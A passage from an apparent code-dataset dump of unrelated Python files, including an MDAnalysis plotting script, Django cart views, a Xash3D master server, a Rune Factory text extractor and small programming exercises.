tuple(points[i].astype(int))\n\n cv2.line(display, (x, y), pi, color, 1, 16)\n cv2.circle(display, pi, 4, color, -1, 16)\n\n cv2.imshow('knn', display)\n\n ##################################################\n # Install our mouse callback and run the demo\n\n cv2.setMouseCallback('knn', mouse, None)\n\n while True:\n k = np.uint8(cv2.waitKey(5)).view(np.int8)\n if k == 27:\n break\n\nif __name__ == '__main__':\n main()\n","sub_path":"knn_demo.py","file_name":"knn_demo.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"350301447","text":"import numpy as np\nimport MDAnalysis\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc, rcParams\nimport argparse\n\n#rcParams['axes.labelsize'] = 8\n#rcParams['xtick.labelsize'] = 8\n#rcParams['ytick.labelsize'] = 8\n#rcParams['legend.fontsize'] = 10\n#rcParams['font.family'] = ['sans-serif']\n#rcParams['font.sans-serif'] = ['Arial']\nrcParams['text.usetex'] = False\nrcParams['svg.fonttype'] = 'none'\n#matplotlib.rcParams['axes.unicode_minus'] = False\n#rcParams['figure.subplot.wspace']= 0.3\n#rcParams['figure.subplot.bottom']= 0.1\n#rcParams['figure.subplot.hspace']= 0.2\n#rcParams['figure.subplot.left']= 0.125\n#rcParams['figure.subplot.right']= 0.9\n#rcParams['figure.subplot.top']= 0.9\n#matplotlib.rcParams['axes.linewidth']= .5\n\n##########\n# ARGUMENT 
HANDLING\n##########\n\nparser = argparse.ArgumentParser('Calculates FEZ distances')\n\nparser.add_argument(\n\t\"-f\",\n\ttype = str,\n\tdefault = './mdord.pdb',\n\thelp=\"Structure (pdb)\"\n)\n\nparser.add_argument(\n\t\"-t\",\n\ttype = str,\t\n\tdefault = 'md-c.xtc',\n\thelp=\"Trajectory (xtc)\"\n)\n\nparser.add_argument(\n\t\"-o\",\n\ttype = str,\n\tdefault = None,\n\thelp=\"output name\"\n)\n\nargs = parser.parse_args()\n\n##########\n# DEFINITIONS\n##########\n\ndef dis (sel1, sel2, x) :\n\tres_i = x.select_atoms(sel1 + ' and name CA').coordinates()\n\tres_j = x.select_atoms(sel2 + ' and name CA').coordinates()\n\tdis = np.linalg.norm(res_i - res_j)\n\treturn dis\n\n##########\n# CALCULATIONS\n##########\n\nu = MDAnalysis.Universe(args.f, args.t)\nprotein = u.select_atoms('protein')\n\nup = MDAnalysis.Universe('./UP_correctpro.pdb')\nup_pro = up.select_atoms('protein')\n\ndn = MDAnalysis.Universe('./DN_correctH.pdb')\ndn_pro = dn.select_atoms('protein')\n\nFen_A = []\nFen_B = []\nZip_A = []\nZip_B = []\nExp_A = []\nExp_B = []\n\nfor ts in u.trajectory:\n\tFen_A.append(dis('resid 324 and segid A', 'resid 198 and segid B', protein))\n\tFen_B.append(dis('resid 324 and segid B', 'resid 198 and segid A', protein))\n\tZip_A.append(dis('resid 326 and segid A', 'resid 237 and segid A', protein))\n\tZip_B.append(dis('resid 326 and segid B', 'resid 237 and segid B', protein))\n\tExp_A.append(dis('resid 322 and segid A', 'resid 212 and segid A', protein))\n\tExp_B.append(dis('resid 322 and segid B', 'resid 212 and segid B', protein))\t\n\nFAup = []\nFBup = []\nZAup = []\nZBup = []\nEAup = []\nEBup = []\n\nFAup.append(dis('resid 324 and segid A', 'resid 198 and segid B', up_pro))\nFBup.append(dis('resid 324 and segid B', 'resid 198 and segid A', up_pro))\nZAup.append(dis('resid 326 and segid A', 'resid 237 and segid A', up_pro))\nZBup.append(dis('resid 326 and segid B', 'resid 237 and segid B', up_pro))\nEAup.append(dis('resid 322 and segid A', 'resid 212 and segid A', up_pro))\nEBup.append(dis('resid 322 and segid B', 'resid 212 and segid B', up_pro))\n\nFAdn = []\nFBdn = []\nZAdn = []\nZBdn = []\nEAdn = []\nEBdn = []\n\nFAdn.append(dis('resid 324 and segid A', 'resid 198 and segid B', dn_pro))\nFBdn.append(dis('resid 324 and segid B', 'resid 198 and segid A', dn_pro))\nZAdn.append(dis('resid 326 and segid A', 'resid 237 and segid A', dn_pro))\nZBdn.append(dis('resid 326 and segid B', 'resid 237 and segid B', dn_pro))\nEAdn.append(dis('resid 322 and segid A', 'resid 212 and segid A', dn_pro))\nEBdn.append(dis('resid 322 and segid B', 'resid 212 and segid B', dn_pro))\n\n##########\n# PLOTTING\n##########\n\n#plt.figure(figsize=(20,16))\n#A = plt.subplot(211)\n#plt.plot(Fen_A, label = 'Fenestration', color = 'blue', linewidth = 3)\n#plt.plot(Zip_A, label = 'Zipper', color = 'green', linewidth = 3)\n#plt.plot(Exp_A, label = 'Expansion', color = 'red', linewidth = 3)\n#plt.setp(A.get_xticklabels(), visible=False)\n#plt.setp(A.get_yticklabels(), fontsize = 18)\n#plt.ylabel(\"z ($\\AA$)\", fontsize = '24')\n#plt.legend(fontsize = 'xx-large', loc = 'best') \n#plt.title('Chain A', fontsize = 36) \n#B = plt.subplot(212, sharex = A, sharey = A)\n#plt.plot(Fen_B, label = 'Fenestration', color = 'blue', linewidth = 3)\n#plt.plot(Zip_B, label = 'Zipper', color = 'green', linewidth = 3)\n#plt.plot(Exp_B, label = 'Expansion', color = 'red', linewidth = 3)\n#plt.setp(B.get_xticklabels(), fontsize = 18)\n#plt.setp(B.get_yticklabels(), fontsize = 18)\n#plt.xlabel(\"time (ns)\", fontsize = '24')\n#plt.ylabel(\"z 
($\AA$)", fontsize = '24')\n#v = [0,100,3,18]\n#plt.axis(v)\n#plt.title('Chain B', fontsize = 36) \n#plt.savefig(\"{}_FEZ_AB.png\".format(args.o), format='png', dpi=300)\n#plt.savefig(\"{}_FEZ_AB.svg\".format(args.o), format='svg', dpi=300)\n\nplt.clf()\nplt.figure(figsize=(16,8))\nFZ = plt.subplot(121)\nplt.scatter(Zip_A, Fen_A, label = 'Chain A', color = 'green')\nplt.scatter(Zip_B, Fen_B, label = 'Chain B', color = 'gray')\nplt.plot(Zip_A, Fen_A, label = 'Chain A', color = 'green', alpha = 0.5)\nplt.plot(Zip_B, Fen_B, label = 'Chain B', color = 'gray', alpha = 0.5)\nplt.scatter(ZAup, FAup, label = '4BW5 (Up)', color = 'black', marker = 'D', s = 40)\nplt.scatter(ZAdn, FAdn, label = '4XDJ (Down)', color = 'blue', marker = 'D', s = 40)\nplt.xlabel('Zipper ($\AA$)', fontsize = '18')\nplt.ylabel('Fenestration ($\AA$)', fontsize = '18')\nplt.setp(FZ.get_xticklabels(), fontsize = 18)\nplt.setp(FZ.get_yticklabels(), fontsize = 18)\nplt.legend(fontsize = 'x-large', loc = 'best')\nFE = plt.subplot(122, sharex = FZ, sharey = FZ)\nplt.scatter(Exp_A, Fen_A, label = 'Chain A', color = 'red')\nplt.scatter(Exp_B, Fen_B, label = 'Chain B', color = 'pink')\nplt.plot(Exp_A, Fen_A, label = 'Chain A', color = 'red', alpha = 0.5)\nplt.plot(Exp_B, Fen_B, label = 'Chain B', color = 'pink', alpha = 0.5)\nplt.scatter(EAup, FAup, label = '4BW5 (Up)', color = 'black', marker = 'D', s = 40)\nplt.scatter(EAdn, FAdn, label = '4XDJ (Down)', color = 'blue', marker = 'D', s = 40)\nplt.xlabel('Expansion ($\AA$)', fontsize = '18')\nplt.setp(FE.get_xticklabels(), fontsize = 18)\nplt.setp(FE.get_yticklabels(), visible = False)\nv = [3,18,3,16]\nplt.axis(v)\nplt.legend(fontsize = 'x-large', loc = 'best')\nplt.savefig(\"{}_FZ_FE.png\".format(args.o), format='png', dpi=300)\nplt.savefig(\"{}_FZ_FE.svg\".format(args.o), format='svg', dpi=300)\n","sub_path":"distance+xtal.py","file_name":"distance+xtal.py","file_ext":"py","file_size_in_byte":6004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619360849","text":"import numpy as np\nimport sympy as sp\n\ndef splain(x, y):\n\n    x = np.array(x)\n    y = np.array(y)\n\n    dimension = 2*len(x) - 2\n\n    matrix = np.zeros((dimension, dimension))\n    m = (dimension-len(y))\n    b = np.append(y, np.zeros(m))\n\n    interpolation(x, matrix)\n    continuity(x, matrix)\n\n    np.set_printoptions(formatter={'float': lambda x: \"{0:0.5f}\".format(x)})\n\n    print('\\033[96m')\n    print('Linear spline coefficients')\n    print('\\033[0m')\n    xact = np.linalg.solve(matrix, b)\n    for i in range(0,len(matrix), 2):\n        expr = f'{float(\"{:.5f}\".format(xact[i]))} <-> {float(\"{:.5f}\".format(xact[i+1]))}'\n        print(expr)\n\n    print('\\033[96m')\n    print('Linear splines')\n    print('\\033[0m')\n    x = sp.symbols('x')\n    for i in range(0,len(matrix), 2):\n        expr = xact[i]*x + xact[i+1]\n        str = sp.latex(expr)\n        print(str)\n\n\n\ndef 
interpolation(x, matrix):\n\n matrix[0][0] = x[0] \n matrix[0][1] = 1\n\n xn = 1\n i = 0\n for j in range(1, len(x)):\n matrix[j][i] = x[xn]\n matrix[j][i+1] = 1\n i += 2\n xn += 1\n\ndef continuity(x, matrix):\n start = len(x)\n dimension = len(matrix)\n\n\n xn = 1\n i = 0\n for j in range(start, dimension):\n matrix[j][i] = x[xn]\n matrix[j][i+1] = 1\n matrix[j][i+2] = -x[xn]\n matrix[j][i+3] = -1\n xn += 1\n i += 2","sub_path":"Methods/M22_Lineal_Splain.py","file_name":"M22_Lineal_Splain.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"347383193","text":"from django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\nfrom django.views.decorators.http import require_POST\n\nfrom shop.models import Produk\nfrom .cart import Keranjang\nfrom .forms import TambahProdukForm\n\n\n@require_POST\ndef cart_tambah(req, produk_id):\n krj = Keranjang(req)\n produk = get_object_or_404(Produk, id=produk_id)\n form = TambahProdukForm(req.POST)\n if form.is_valid():\n cd = form.cleaned_data\n krj.tambah(produk,\n cd['jumlah'],\n cd['override'], )\n\n return redirect('cartApp:detailUrl')\n\n\n@require_POST\ndef cart_hapus(req, produk_id):\n krj = Keranjang(req)\n produk = get_object_or_404(Produk, id=produk_id)\n krj.hapus(produk)\n return redirect('cartApp:detailUrl')\n\n\ndef cart_detail(req):\n krj = Keranjang(req)\n for item in krj:\n item['ubah_jml_form'] = TambahProdukForm(initial={\n 'jumlah': item['jml'],\n 'override': True,\n })\n return render(req, 'cart/detail.html', {'keranjangKey': krj})\n","sub_path":"antoniomele_olshop/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"376844550","text":"from django import forms\nfrom django.db.models import get_model\n\nfrom itertools import chain\n\nfrom django.forms.util import flatatt\nfrom django.utils.datastructures import MultiValueDict, MergeDict\nfrom django.utils.html import format_html\nfrom django.utils.safestring import mark_safe\nfrom django.template.loader import render_to_string\n\n\nclass TreeWidget(forms.widgets.SelectMultiple):\n def __init__(self, instance, attrs=None, choices=()):\n super(TreeWidget, self).__init__(attrs)\n self.instance = instance\n\n def render(self, name, value, attrs=None, choices=()):\n final_attrs = self.build_attrs(attrs, name=name)\n output = render_to_string('treeheaders/TreeWidget.html', {\n 'final_attrs': final_attrs,\n 'instance': self.instance,\n 'app_label': self.instance._meta.app_label,\n 'model_name': self.instance._meta.object_name,\n 'value': value\n })\n return mark_safe(output)\n\n class Media:\n js = (\n '//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js',\n 'jstree/js/jstree.js',\n 'js/jquery-csrf.js',\n )\n css = {\n 'screen': ('jstree/themes/default/style.min.css',)\n }\n","sub_path":"apps/treeheaders/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"41941641","text":"#!/usr/bin/env python3\nimport socket\nimport random\nimport sys\nimport traceback\nimport logging\nimport os\nfrom optparse import OptionParser\nfrom struct import pack\nfrom time import time\n\nfrom server_entry import ServerEntry\nfrom protocol import MasterProtocol\n\nLOG_FILENAME = 'pymaster.log'\n\ndef logPrint( msg 
):\n\tlogging.debug( msg )\n\nclass PyMaster:\n\tdef __init__(self, ip, port):\n\t\tself.serverList = []\n\t\tself.sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\n\t\tself.sock.bind( (ip, port) )\n\n\t\tlogPrint(\"Welcome to PyMaster!\")\n\t\tlogPrint(\"I ask you again, are you my master?\")\n\t\tlogPrint(\"Running on %s:%d\" % (ip, port))\n\n\tdef serverLoop(self):\n\t\tdata, addr = self.sock.recvfrom(1024)\n\t\tdata = data.decode('latin_1')\n\n\t\tif( data[0] == MasterProtocol.clientQuery ):\n\t\t\tself.clientQuery(data, addr)\n\t\telif( data[0] == MasterProtocol.challengeRequest ):\n\t\t\tself.sendChallengeToServer(data, addr)\n\t\telif( data[0] == MasterProtocol.addServer ):\n\t\t\tself.addServerToList(data, addr)\n\t\telif( data[0] == MasterProtocol.removeServer ):\n\t\t\tself.removeServerFromList(data, addr)\n\t\telse:\n\t\t\tlogPrint(\"Unknown message: {0} from {1}:{2}\".format(data, addr[0], addr[1]))\n\n\tdef clientQuery(self, data, addr):\n\t\tregion = data[1] # UNUSED\n\t\tdata = data.strip('1' + region)\n\t\ttry:\n\t\t\tquery = data.split('\\0')\n\t\texcept ValueError:\n\t\t\tlogPrint(traceback.format_exc())\n\t\t\treturn\n\n\t\tqueryAddr = query[0] # UNUSED\n\t\trawFilter = query[1]\n\n\t\t# Remove first \\ character\n\t\trawFilter = rawFilter.strip('\\\\')\n\t\tsplit = rawFilter.split('\\\\')\n\n\t\t# Use NoneType as undefined\n\t\tgamedir = 'valve' # halflife, by default\n\t\tclver = None\n\t\tnat = 0\n\n\t\tfor i in range( 0, len(split), 2 ):\n\t\t\ttry:\n\t\t\t\tkey = split[i + 1]\n\t\t\t\tif( split[i] == 'gamedir' ):\n\t\t\t\t\tgamedir = key.lower() # keep gamedir in lowercase\n\t\t\t\telif( split[i] == 'nat' ):\n\t\t\t\t\tnat = int(key)\n\t\t\t\telif( split[i] == 'clver' ):\n\t\t\t\t\tclver = key\n\t\t\t\telse:\n\t\t\t\t\tlogPrint('Unhandled info string entry: {0}/{1}. 
Infostring was: {2}'.format(split[i], key, split))\n\t\t\texcept IndexError:\n\t\t\t\tpass\n\n\t\tif( clver == None ): # Probably an old vulnerable version\n\t\t\tself.fakeInfoForOldVersions( gamedir, addr )\n\t\t\treturn\n\n\t\tpacket = MasterProtocol.queryPacketHeader\n\t\tfor i in self.serverList:\n\t\t\tif( time() > i.die ):\n\t\t\t\tself.serverList.remove(i)\n\t\t\t\tcontinue\n\n\t\t\tif( not i.check ):\n\t\t\t\tcontinue\n\n\t\t\tif( nat != i.nat ):\n\t\t\t\tcontinue\n\n\t\t\tif( gamedir != None ):\n\t\t\t\tif( gamedir != i.gamedir ):\n\t\t\t\t\tcontinue\n\n\t\t\tif( nat ):\n\t\t\t\treply = '\\xff\\xff\\xff\\xffc {0}:{1}'.format( addr[0], addr[1] )\n\t\t\t\tdata = reply.encode( 'latin_1' )\n\t\t\t\t# Tell server to send info reply\n\t\t\t\tself.sock.sendto( data, i.addr )\n\n\t\t\t# Use pregenerated address string\n\t\t\tpacket += i.queryAddr\n\t\tpacket += b'\\0\\0\\0\\0\\0\\0' # Fill last IP:Port with \\0\n\t\tself.sock.sendto(packet, addr)\n\n\tdef fakeInfoForOldVersions(self, gamedir, addr):\n\t\tdef sendFakeInfo(sock, warnmsg, gamedir, addr):\n\t\t\tbaseReply = b\"\\xff\\xff\\xff\\xffinfo\\n\\host\\\\\" + warnmsg.encode('utf-8') + b\"\\map\\\\update\\dm\\\\0\\\\team\\\\0\\coop\\\\0\\\\numcl\\\\32\\maxcl\\\\32\\\\gamedir\\\\\" + gamedir.encode('latin-1') + b\"\\\\\"\n\t\t\tsock.sendto(baseReply, addr)\n\n\t\tsendFakeInfo(self.sock, \"This version is not\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"supported anymore\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"Please update Xash3DFWGS\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"From GooglePlay or GitHub\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"Эта версия\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"устарела\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"Обновите Xash3DFWGS c\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"GooglePlay или GitHub\", gamedir, addr)\n\n\tdef removeServerFromList(self, data, addr):\n\t\tfor i in self.serverList:\n\t\t\tif (i.addr == addr):\n\t\t\t\tlogPrint(\"Remove Server: from {0}:{1}\".format(addr[0], addr[1]))\n\t\t\t\tself.serverList.remove(i)\n\n\tdef sendChallengeToServer(self, data, addr):\n\t\tlogPrint(\"Challenge Request: from {0}:{1}\".format(addr[0], addr[1]))\n\t\t# At first, remove old server- data from list\n\t\t#self.removeServerFromList(None, addr)\n\n\t\tcount = 0\n\t\tfor i in self.serverList:\n\t\t\tif ( i.addr[0] == addr[0] ):\n\t\t\t\tif( i.addr[1] == addr[1] ):\n\t\t\t\t\tself.serverList.remove(i)\n\t\t\t\telse:\n\t\t\t\t\tcount += 1\n\t\t\t\tif( count > 7 ):\n\t\t\t\t\treturn\n\n\t\t# Generate a 32 bit challenge number\n\t\tchallenge = random.randint(0, 2**32-1)\n\n\t\t# Add server to list\n\t\tself.serverList.append(ServerEntry(addr, challenge))\n\n\t\t# And send him a challenge\n\t\tpacket = MasterProtocol.challengePacketHeader\n\t\tpacket += pack('I', challenge)\n\t\tself.sock.sendto(packet, addr)\n\n\tdef addServerToList(self, data, addr):\n\t\tlogPrint(\"Add Server: from {0}:{1}\".format(addr[0], addr[1]))\n\t\t# Remove the header. 
Just for better parsing.\n\t\tserverInfo = data.strip('\\x30\\x0a\\x5c')\n\n\t\t# Find a server with the same address\n\t\tfor serverEntry in self.serverList:\n\t\t\tif( serverEntry.addr == addr ):\n\t\t\t\tbreak\n\n\t\tserverEntry.setInfoString( serverInfo )\n\ndef spawn_pymaster(verbose, ip, port):\n\tif verbose:\n\t\tlogging.getLogger().addHandler(logging.StreamHandler())\n\tlogging.getLogger().addHandler(logging.FileHandler(LOG_FILENAME))\n\tlogging.getLogger().setLevel(logging.DEBUG)\n\n\tmasterMain = PyMaster(ip, port)\n\twhile True:\n\t\ttry:\n\t\t\tmasterMain.serverLoop()\n\t\texcept Exception:\n\t\t\tlogPrint(traceback.format_exc())\n\t\t\tpass\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\tparser.add_option('-i', '--ip', action='store', dest='ip', default='0.0.0.0',\n\t\thelp='ip to listen [default: %default]')\n\tparser.add_option('-p', '--port', action='store', dest='port', type='int', default=27010,\n\t\thelp='port to listen [default: %default]')\n\tparser.add_option('-d', '--daemonize', action='store_true', dest='daemonize', default=False,\n\t\thelp='run in background, argument is uid [default: %default]')\n\tparser.add_option('-q', '--quiet', action='store_false', dest='verbose', default=True,\n\t\thelp='don\'t print to stdout [default: %default]')\n\n\t(options, args) = parser.parse_args()\n\n\tif options.daemonize != 0:\n\t\tfrom daemon import pidfile, DaemonContext\n\n\t\twith DaemonContext(stdout=sys.stdout, stderr=sys.stderr, working_directory=os.getcwd()) as context:\n\t\t\tspawn_pymaster(options.verbose, options.ip, options.port)\n\telse:\n\t\tsys.exit(spawn_pymaster(options.verbose, options.ip, options.port))\n","sub_path":"pymaster.py","file_name":"pymaster.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"638340642","text":"# Author Maria Carroll\n# Adapted from:https://tour.golang.org/flowcontrol/8\n# https://realpython.com/python-square-root-function/\n# Lecturer Andrfew Beatty\n\ndef sqrt(x):\n    # Initial guess.\n    z = 1.0\n    \n    # Keep getting a better estimate for the square root\n    # of x until you are within two decimal places:\n    # loop while the difference between z*z and x is greater than or equal to\n    # 0.01, i.e. until z*z is within 0.01 of x.\n    while abs(z*z - x) >= 0.01:\n        # Get a better approximation for the square root: squaring this improved z\n        # should give a value very close to, or exactly, x.\n        z -= (z*z - x) / (2*z)\n\n    return z\n
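# (Added illustration, not in the original: for x = 2 the successive guesses are 1.0 -> 1.5 -> 1.41667, at which point z*z = 2.0069 is within 0.01 of 2 and the loop stops.)\n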
Details of most popular movie on IMDb is displayed**')\r\n for v in search:\r\n if (name == str(v).lower()):\r\n loc = search.index(v)\r\n break\r\n if (loc != -1): \r\n id = search[loc].movieID\r\n movie = ia.get_movie(id)\r\n curr = movie.current_info\r\n print('\\nMovie: ' + movie['title'] + ' (' + str(movie['year']) + ')')\r\n print('\\nCountry: '+movie.data['countries'][0] + '\\tLanguage: ' + movie.data['languages'][0])\r\n print('\\nIMDb Rating: ',movie.data['rating'])\r\n plot = movie['plot']\r\n pi = ''\r\n for k in plot:\r\n if '::' in k:\r\n ind = k.index('::')\r\n k = k[0:ind]\r\n pi = pi + k\r\n print('\\nSynopsis: ',pi)\r\n cast1 = movie['cast']\r\n cast_var = ''\r\n cast_flag = 0\r\n for h in cast1:\r\n cast_flag = cast_flag + 1\r\n cast_var = cast_var + str(h['name'] + ',')\r\n if (cast_flag > 9):\r\n break\r\n print('\\nCast: ',cast_var[0:len(cast_var)-1])\r\n di = ''\r\n for director in movie['directors']:\r\n di = di + str(director) + '-'\r\n print('\\nDirector: ' + di[0:len(di)-1])\r\n gi = ''\r\n for genre in movie['genres']:\r\n gi = gi + genre + ','\r\n print('\\nGenre: ' + gi[0:len(gi)-1])\r\n else:\r\n print(\"\\nNo such movie exist in database!\")\r\nelse:\r\n print(\"\\nNo such movie exist in database!\")\r\n","sub_path":"moviedb.py","file_name":"moviedb.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290740072","text":"# priyadarshan Ghosh\r\nfrom tkinter import *\r\nfrom tkcalendar import *\r\nwin=Tk()\r\nwin.geometry(\"200x200\")\r\nwin.title(\"Calendar\")\r\nwin.configure(bg=\"yellow\")\r\ndef calendar():\r\n def grabdate():\r\n global date1\r\n date1=cal.get_date()\r\n top.destroy()\r\n Label(win,text=\"Date Selected\",fg=\"green\",font=(\"elephant\",11)).pack()\r\n Label(win,text=date1,fg=\"green\",font=(\"elephant\",11)).pack()\r\n top=Toplevel(win)\r\n cal=Calendar(top,selectmode=\"day\",year=2020,month=7,day=11)\r\n cal.pack()\r\n cbutton=Button(top,text=\"OK\",command=grabdate).pack()\r\nLabel(win,text=\"Select Date\",font=(\"calibri\",20)).pack()\r\nButton(win,text=\"See Calendar\",command=calendar).pack(padx=10,pady=10)\r\nwin.mainloop()","sub_path":"Calender.py","file_name":"Calender.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290123090","text":"# Hint: You may not need all of these. Remove the unused functions.\nfrom hashtables import (HashTable,\n hash_table_insert,\n hash_table_remove,\n hash_table_retrieve,\n hash_table_resize)\n\n\"\"\"\n* The crux of this problem requires us to 'link' tickets together to reconstruct the entire trip. For example, if we have a ticket `('SJC', 'BOS')` that has us flying from San Jose to Boston, then there exists another ticket where Boston is the starting location, `('BOS', 'JFK')`.\n* We can hash each ticket such that the starting location is the key and the destination is the value. 
Then, when constructing the entire route, the `i`th location in the route can be found by checking the hash table for the `i-1`th location.\n* You might need to do some cleanup at the end to make sure results match what the test and example are expecting.\n"""\nclass Ticket:\n    def __init__(self, source, destination):\n        self.source = source\n        self.destination = destination\n\ndef reconstruct_trip(tickets, length):\n    hashtable = HashTable(length)\n    # route = [None] * length\n    route = []\n\n    """\n    YOUR CODE HERE\n    """\n\n    # for loop - ticket in tickets (key: source, value: destination)\n    for ticket in tickets:\n        # hash table insert function ht, source, and destination\n        hash_table_insert(hashtable, ticket.source, ticket.destination)\n    # the first ticket of the trip has source 'NONE'\n    destination = hash_table_retrieve(hashtable, 'NONE')\n    # while loop - destination != 'NONE'\n    while destination != 'NONE':\n        # append destination to route\n        route.append(destination)\n        # destination set to retrieve ht, destination\n        destination = hash_table_retrieve(hashtable, destination)\n\n    # return route\n    return route","sub_path":"hashtables/ex2/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"339037980","text":"from kata.bowling.oo import Frame, Game\n\n\ndef test_empty_game_scores_zero():\n    game = Game()\n    assert game.score() == 0\n\n\ndef play_game(rolls):\n    '''\n    @param rolls: sequence of (x, y) tuples where x represents the first roll and y the second\n    '''\n    game = Game()\n    for roll in rolls:\n        frame = Frame(*roll)\n        game.add_frame(frame)\n    return game\n\n\ndef test_rolling_all_misses_scores_zero():\n    game = play_game(\n        (0, 0) for i in range(10)\n    )\n    assert game.score() == 0\n\n\ndef test_all_ones_score_20():\n    game = play_game(\n        (1, 1) for i in range(10)\n    )\n    assert game.score() == 20\n\n\n#def test_spare_then_three_then_misses_scores_16():\n#    game = play_game(\n#    )\n","sub_path":"kata/tests/bowling/test_oo.py","file_name":"test_oo.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"321705629","text":"# -*- coding:utf-8 -*-\n"""\nStructure:\nfind the start address in the binary via the pointer stored at 0xC (foundoffset).\nRune Factory files separate dialogue lines with 0x00 bytes,\nso we walk the file one byte at a time looking for 0x00.\n\nWhile no 0x00 is seen, keep incrementing shortoffset by 1;\nonce a 0x00 is found, close and reopen the file, seek back to the start address,\nextract shortoffset bytes of dialogue,\nthen add shortoffset to longoffset and treat that as the new start position.\n"""\n\nglobal readfile\nglobal writefile\nimport sys\n\ndef init(inFp):\n    inFp.close()\n    inFp = open(readfile, "rb")\n    return inFp\n\ndef foundoffset(inFp):\n    blank=[]\n    inFp = open(readfile, "rb")\n    inFp.read(0xC)\n    for i in range(1,5):\n        startpath=inFp.read(1)\n        temp=hex(ord(startpath))\n        if(len(temp)==3): # pad single hex digits, e.g. 0x5 -> 0x05\n            temp="0x0"+temp[2]\n        blank.append(temp) # read each byte and append it to blank\n    blank.reverse() # little-endian -> big-endian\n    pointer=""\n    pointer += blank[0]\n    pointer += blank[1]\n    pointer += blank[2]\n    pointer += blank[3]\n    pointer=pointer.replace("0x","")\n    result="0x"+pointer\n    return int(result,16)\n\n\nreadfile=sys.argv[1]\ntry:\n    writefile = sys.argv[2]\nexcept:\n    writefile=readfile\n    writefile+=".txt"\ninFp=0\ntexts=[]\nlongoffset=0 # never reset for the whole run\nshortoffset=0 # reset each time a terminator is found\n\nstartoffset=foundoffset(inFp) # find the start offset (pointer at 0x0C)\nprint(startoffset)\ninFp=open(readfile,"rb")\noutFp=open(writefile,"w")\n\n\ninFp=open(readfile,"rb")\ns = inFp.read(startoffset)\n\n\nwhile True:\n    s = inFp.read(1)\n    #if s == '': break\n    #print ('%02X' % 
int(ord(s))) # print one byte at a time\n    if not s: # EOF: read(1) on a binary file returns b''\n        break\n    if(ord(s)==0):\n        inFp=init(inFp) # close and reopen the file\n        a=inFp.read(startoffset) # seek to the initial cursor\n        if(longoffset!=0):\n            a = inFp.read(longoffset+1) # skip to the previous offset\n            a = inFp.read(shortoffset-1) # read the whole dialogue length\n        else:\n            a = inFp.read(shortoffset) # read the whole dialogue length\n        longoffset+=shortoffset\n        shortoffset=0 # reset the dialogue length\n\n        a=str(a)\n        print(a[1:])\n        outFp.write(a[2:-1])\n        outFp.write("\\n")\n        a=inFp.read(1)\n\n    shortoffset+=1 # increment the dialogue length\n\ninFp.close()\noutFp.close()","sub_path":"Deprecated/RF Text Dump.py","file_name":"RF Text Dump.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"276368455","text":"class Morph:\n    def __init__(self, surface, base, pos, pos1):\n        self.surface = surface\n        self.base = base\n        self.pos = pos\n        self.pos1 = pos1\n\n    def __str__(self):\n        return "surface:({})\\tbase:({})\\tpos:({})\\tpos1:({})".format(\n            self.surface, self.base, self.pos, self.pos1\n        )\n\n\ndef morphs(sentence):\n    morph_list = []\n    for line in sentence:\n        line = line.split("\\t")\n        if line == [""]:\n            continue\n        surface = line[0]\n        line = line[1].split(",")\n        base = line[-3]\n        pos = line[0]\n        pos1 = line[1]\n        morph = Morph(surface, base, pos, pos1)\n        morph_list.append(morph)\n\n    return morph_list\n\n\nclass Chunk:\n    def __init__(self):\n        self.morphs = []\n        self.dst = 0\n        self.srcs = []\n\n    def __str__(self):\n        string = "".join([morph.surface for morph in self.morphs])\n        return "{}\\tdst:({})\\tsrcs:({})".format(string, self.dst, self.srcs)\n\n    def rm_symbol(self):\n        morphs = self.morphs\n        morphs = [morph for morph in morphs if morph.pos != "記号"]\n        return morphs\n\n    def check_pos(self, pos):\n        morphs = self.morphs\n        for morph in morphs:\n            if morph.pos == pos:\n                return True\n        return False\n\n\ndef chunks(rr, lines):\n    rr_dict = {r: l for r, l in zip(rr, lines)}\n    chunk_list = []\n\n    for rr, lines in rr_dict.items():\n        rr = rr.split()\n        chunk = Chunk()\n        lines = lines.split("\\n")\n        morph_list = morphs(lines)\n        chunk.morphs = morph_list\n        chunk.dst = int(rr[2].replace("D", ""))\n        chunk_list.append(chunk)\n\n    for i, chunk in enumerate(chunk_list):\n        if chunk.dst != -1:\n            chunk_list[chunk.dst].srcs.append(i)\n    return chunk_list\n\n\ndef 